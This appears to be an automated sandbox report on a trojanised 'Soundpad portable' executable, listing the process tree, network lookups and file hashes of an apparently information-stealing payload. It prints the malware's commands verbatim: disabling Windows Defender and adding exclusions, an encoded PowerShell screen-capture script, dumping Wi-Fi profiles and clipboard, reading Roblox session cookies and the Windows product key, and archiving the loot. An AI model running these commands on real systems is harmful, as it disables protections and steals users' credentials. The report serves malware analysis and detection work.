| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe
"C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe"
C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe
"C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe
"C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe
"C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kaxfwgoa\kaxfwgoa.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx1.8.0.dll"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a4 0x4fc
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85F9.tmp" "c:\Users\Admin\AppData\Local\Temp\kaxfwgoa\CSC488C7A925448404E8247E57CD926F946.TMP"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\l1sYo.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\l1sYo.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\GetCopy.TS"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | blank-ymkfz.in | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI26682\python312.dll
| MD5 | cbd02b4c0cf69e5609c77dfd13fba7c4 |
| SHA1 | a3c8f6bfd7ffe0783157e41538b3955519f1e695 |
| SHA256 | ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5 |
| SHA512 | a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/2800-26-0x00007FF9F2CD0000-0x00007FF9F33A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI26682\base_library.zip
| MD5 | 630153ac2b37b16b8c5b0dbb69a3b9d6 |
| SHA1 | f901cd701fe081489b45d18157b4a15c83943d9d |
| SHA256 | ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2 |
| SHA512 | 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41 |
C:\Users\Admin\AppData\Local\Temp\_MEI26682\_ctypes.pyd
| MD5 | e7629e12d646da3be8d60464ad457cef |
| SHA1 | 17cf7dacb460183c19198d9bb165af620291bf08 |
| SHA256 | eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789 |
| SHA512 | 974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b |
